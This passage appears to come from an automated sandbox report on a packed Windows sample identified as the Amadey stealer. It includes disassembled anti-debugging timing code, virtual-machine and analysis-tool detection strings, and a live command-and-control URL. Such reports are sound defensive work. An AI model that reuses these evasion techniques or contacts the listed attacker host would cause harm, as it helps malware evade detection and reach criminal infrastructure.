                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100753 second address: 51007A6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A27Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FC16945A27Eh 0x00000011 sbb cl, 00000008h 0x00000014 jmp 00007FC16945A27Bh 0x00000019 popfd 0x0000001a mov bx, cx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 pushad 0x00000021 mov ecx, 57ABC077h 0x00000026 popad 0x00000027 push FFFFFFFEh 0x00000029 push eax 0x0000002a push edx 0x0000002b push eax 0x0000002c push edx 0x0000002d jmp 00007FC16945A280h 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51007A6 second address: 51007B5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461A9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51007B5 second address: 5100816 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push 54531947h 0x0000000e jmp 00007FC16945A287h 0x00000013 add dword ptr [esp], 22A6A6D1h 0x0000001a jmp 00007FC16945A286h 0x0000001f push 3F4E352Bh 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 popad 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100816 second address: 510081A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 510081A second address: 5100820 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100820 second address: 5100881 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC169461A9Bh 0x00000009 and ch, FFFFFFCEh 0x0000000c jmp 00007FC169461AA9h 0x00000011 popfd 0x00000012 pushad 0x00000013 popad 0x00000014 popad 0x00000015 pop edx 0x00000016 pop eax 0x00000017 xor dword ptr [esp], 49BE9B2Bh 0x0000001e jmp 00007FC169461A9Ch 0x00000023 mov eax, dword ptr fs:[00000000h] 0x00000029 pushad 0x0000002a mov ax, 781Dh 0x0000002e mov dx, si 0x00000031 popad 0x00000032 nop 0x00000033 push eax 0x00000034 push edx 0x00000035 jmp 00007FC169461A9Bh 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100881 second address: 51008E7 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A289h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FC16945A27Ah 0x00000013 jmp 00007FC16945A285h 0x00000018 popfd 0x00000019 pushfd 0x0000001a jmp 00007FC16945A280h 0x0000001f or ecx, 3997A768h 0x00000025 jmp 00007FC16945A27Bh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 51008E7 second address: 5100914 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC169461AA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FC169461A9Dh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100A1A second address: 5100AA8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushfd 0x00000006 jmp 00007FC16945A27Dh 0x0000000b sub ax, 7B36h 0x00000010 jmp 00007FC16945A281h 0x00000015 popfd 0x00000016 popad 0x00000017 xchg eax, edi 0x00000018 jmp 00007FC16945A27Eh 0x0000001d mov eax, dword ptr [76FBB370h] 0x00000022 jmp 00007FC16945A280h 0x00000027 xor dword ptr [ebp-08h], eax 0x0000002a pushad 0x0000002b jmp 00007FC16945A27Eh 0x00000030 pushfd 0x00000031 jmp 00007FC16945A282h 0x00000036 xor cx, E3E8h 0x0000003b jmp 00007FC16945A27Bh 0x00000040 popfd 0x00000041 popad 0x00000042 xor eax, ebp 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AA8 second address: 5100AAC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AAC second address: 5100AB0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AB0 second address: 5100AB6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AB6 second address: 5100AD0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC16945A286h 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AD0 second address: 5100AD4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100AD4 second address: 5100B21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edx 0x00000009 jmp 00007FC16945A27Ch 0x0000000e mov dword ptr [esp], eax 0x00000011 jmp 00007FC16945A280h 0x00000016 lea eax, dword ptr [ebp-10h] 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c pushfd 0x0000001d jmp 00007FC16945A27Ch 0x00000022 or esi, 3A11AB08h 0x00000028 jmp 00007FC16945A27Bh 0x0000002d popfd 0x0000002e rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B21 second address: 5100B6C instructions: 0x00000000 rdtsc 0x00000002 movzx ecx, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov di, E638h 0x0000000b popad 0x0000000c mov dword ptr fs:[00000000h], eax 0x00000012 jmp 00007FC169461AA7h 0x00000017 mov esi, dword ptr [ebp+08h] 0x0000001a jmp 00007FC169461AA6h 0x0000001f mov eax, dword ptr [esi+10h] 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B6C second address: 5100B70 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B70 second address: 5100B76 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B76 second address: 5100B7B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100B7B second address: 5100BD4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov si, 8937h 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d jmp 00007FC169461A9Ah 0x00000012 jne 00007FC1DB220C28h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b call 00007FC169461A9Dh 0x00000020 pop ecx 0x00000021 pushfd 0x00000022 jmp 00007FC169461AA1h 0x00000027 add ecx, 70F49246h 0x0000002d jmp 00007FC169461AA1h 0x00000032 popfd 0x00000033 popad 0x00000034 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100BD4 second address: 5100C11 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC16945A281h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub eax, eax 0x0000000b pushad 0x0000000c mov cx, dx 0x0000000f popad 0x00000010 mov dword ptr [ebp-20h], eax 0x00000013 jmp 00007FC16945A282h 0x00000018 mov ebx, dword ptr [esi] 0x0000001a pushad 0x0000001b push esi 0x0000001c movsx ebx, ax 0x0000001f pop esi 0x00000020 push eax 0x00000021 push edx 0x00000022 mov bl, 14h 0x00000024 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100C11 second address: 5100C2E instructions: 0x00000000 rdtsc 0x00000002 mov si, 378Dh 0x00000006 pop edx 0x00000007 pop eax 0x00000008 popad 0x00000009 mov dword ptr [ebp-24h], ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC169461A9Fh 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\setup.exeRDTSC instruction interceptor: First address: 5100C2E second address: 5100C50 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ecx, edx 0x00000005 mov bh, 3Dh 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a test ebx, ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f jmp 00007FC16945A282h 0x00000014 popad 0x00000015 rdtsc
                    Tries to evade debugger and weak emulator (self modifying code)
                    Source: C:\Users\user\Desktop\setup.exeSpecial instruction interceptor: First address: 666B2D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeSpecial instruction interceptor: First address: 11F6B2D instructions caused by: Self-modifying code
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_05150DB0 rdtsc 0_2_05150DB0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeWindow / User API: threadDelayed 450Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4296Thread sleep time: -54027s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820Thread sleep count: 56 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 4820Thread sleep time: -112056s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052Thread sleep count: 450 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052Thread sleep time: -13500000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 5480Thread sleep time: -540000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696Thread sleep count: 47 > 30Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 3696Thread sleep time: -94047s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe TID: 7052Thread sleep time: -30000s >= -30000sJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeLast function: Thread delayed
                    Source: C:\Users\user\Desktop\setup.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 180000Jump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread delayed: delay time: 30000Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWSo
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: setup.exe, 00000000.00000002.1692432472.0000000001411000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\
                    Source: explorti.exe, 00000006.00000002.2883573047.0000000000758000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: setup.exe, 00000000.00000002.1691582983.00000000005BA000.00000040.00000001.01000000.00000003.sdmp, explorti.exe, 00000001.00000002.1716995664.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000002.00000002.1729377013.000000000114A000.00000040.00000001.01000000.00000007.sdmp, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
                    Source: setup.exe, 00000000.00000003.1659828144.0000000001427000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}D
                    Source: C:\Users\user\Desktop\setup.exeSystem information queried: ModuleInformationJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess information queried: ProcessInformationJump to behavior

                    Anti Debugging

                    barindex
                    Hides threads from debuggers
                    Source: C:\Users\user\Desktop\setup.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeThread information set: HideFromDebuggerJump to behavior
                    Tries to detect sandboxes and other dynamic analysis tools (window names)
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: regmonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: gbdyllo
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: procmon_window_class
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: ollydbg
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: filemonclass
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: NTICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SICE
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeFile opened: SIWVID
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeProcess queried: DebugPortJump to behavior
                    Source: C:\Users\user\Desktop\setup.exeCode function: 0_2_05150DB0 rdtsc 0_2_05150DB0
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F8645B mov eax, dword ptr fs:[00000030h]6_2_00F8645B
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F8A1C2 mov eax, dword ptr fs:[00000030h]6_2_00F8A1C2
                    Source: C:\Users\user\Desktop\setup.exeProcess created: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe "C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe" Jump to behavior
                    Source: explorti.exe, explorti.exe, 00000006.00000002.2883811132.000000000114A000.00000040.00000001.01000000.00000007.sdmpBinary or memory string: >Program Manager
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F6D312 cpuid 6_2_00F6D312
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeQueries volume information: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe VolumeInformationJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exeCode function: 6_2_00F6CB1A GetSystemTimePreciseAsFileTime,GetSystemTimePreciseAsFileTime,6_2_00F6CB1A

                    Stealing of Sensitive Information

                    barindex
                    Yara detected Amadeys stealer DLL
                    Source: Yara matchFile source: 2.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 0.2.setup.exe.3c0000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 1.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 6.2.explorti.exe.f50000.0.unpack, type: UNPACKEDPE
                    Source: Yara matchFile source: 00000006.00000002.2883746071.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000003.1651021209.0000000004F40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000003.1689016813.0000000005740000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000006.00000003.2289232500.00000000049F0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000000.00000002.1691354588.00000000003C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000003.1676236773.0000000004A80000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000001.00000002.1716934114.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY
                    Source: Yara matchFile source: 00000002.00000002.1729291467.0000000000F51000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

                    Mitre Att&ck Matrix

                    ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                    Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
                    Command and Scripting Interpreter                    		1
                    Scheduled Task/Job                    		12
                    Process Injection                    		1
                    Masquerading                    		OS Credential Dumping1
                    System Time Discovery                    		Remote Services1
                    Archive Collected Data                    		1
                    Encrypted Channel                    		Exfiltration Over Other Network MediumAbuse Accessibility Features
                    CredentialsDomainsDefault Accounts1
                    Scheduled Task/Job                    		1
                    DLL Side-Loading                    		1
                    Scheduled Task/Job                    		251
                    Virtualization/Sandbox Evasion                    		LSASS Memory641
                    Security Software Discovery                    		Remote Desktop ProtocolData from Removable Media1
                    Ingress Tool Transfer                    		Exfiltration Over BluetoothNetwork Denial of Service
                    Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                    DLL Side-Loading                    		12
                    Process Injection                    		Security Account Manager2
                    Process Discovery                    		SMB/Windows Admin SharesData from Network Shared Drive1
                    Non-Application Layer Protocol                    		Automated ExfiltrationData Encrypted for Impact
                    Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook2
                    Obfuscated Files or Information                    		NTDS251
                    Virtualization/Sandbox Evasion                    		Distributed Component Object ModelInput Capture11
                    Application Layer Protocol                    		Traffic DuplicationData Destruction
                    Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script12
                    Software Packing                    		LSA Secrets1
                    Application Window Discovery                    		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                    Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                    DLL Side-Loading                    		Cached Domain Credentials1
                    File and Directory Discovery                    		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                    DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup ItemsCompile After DeliveryDCSync224
                    System Information Discovery                    		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery

                    Behavior Graph

                    Hide Legend

                    Legend:

                    • Process
                    • Signature
                    • Created File
                    • DNS/IP Info
                    • Is Dropped
                    • Is Windows Process
                    • Number of created Registry Values
                    • Number of created Files
                    • Visual Basic
                    • Delphi
                    • Java
                    • .Net C# or VB.NET
                    • C, C++ or other language
                    • Is malicious
                    • Internet

                    Screenshots

                    Thumbnails

                    This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                    windows-stand

                    Antivirus, Machine Learning and Genetic Malware Detection

                    Initial Sample

                    SourceDetectionScannerLabelLink
                    setup.exe100%AviraTR/Crypt.TPM.Gen
                    setup.exe100%Joe Sandbox ML

                    Dropped Files

                    SourceDetectionScannerLabelLink
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%AviraTR/Crypt.TPM.Gen
                    C:\Users\user\AppData\Local\Temp\0d8f5eb8a7\explorti.exe100%Joe Sandbox ML

                    Unpacked PE Files

                    No Antivirus matches

                    Domains

                    No Antivirus matches

                    URLs

                    SourceDetectionScannerLabelLink
                    http://185.215.113.19/100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpV100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php6100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpC:100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpppData100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpQ100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php1100%Avira URL Cloudphishing
                    http://185.215.113.19/=100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpeb8a7100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpWindows100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php&100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpm32100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php54100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpL3100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpon100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.php(100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phprosoft100%Avira URL Cloudphishing
                    http://185.215.113.19/Vi9leo/index.phpoft100%Avira URL Cloudphishing

                    Domains and IPs

                    Contacted Domains

                    No contacted domains info

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phptrue
                    • Avira URL Cloud: phishing
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    http://185.215.113.19/Vi9leo/index.phpppDataexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/=explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.php1explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpQexplorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpC:explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmptrue
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.php6explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpVexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpeb8a7explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpWindowsexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpm32explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.php54explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phponexplorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.phpL3explorti.exe, 00000006.00000002.2883573047.0000000000740000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.php&explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
                    http://185.215.113.19/Vi9leo/index.php(explorti.exe, 00000006.00000002.2883573047.0000000000718000.00000004.00000020.00020000.00000000.sdmpfalse
                    • Avira URL Cloud: phishing
                    		unknown
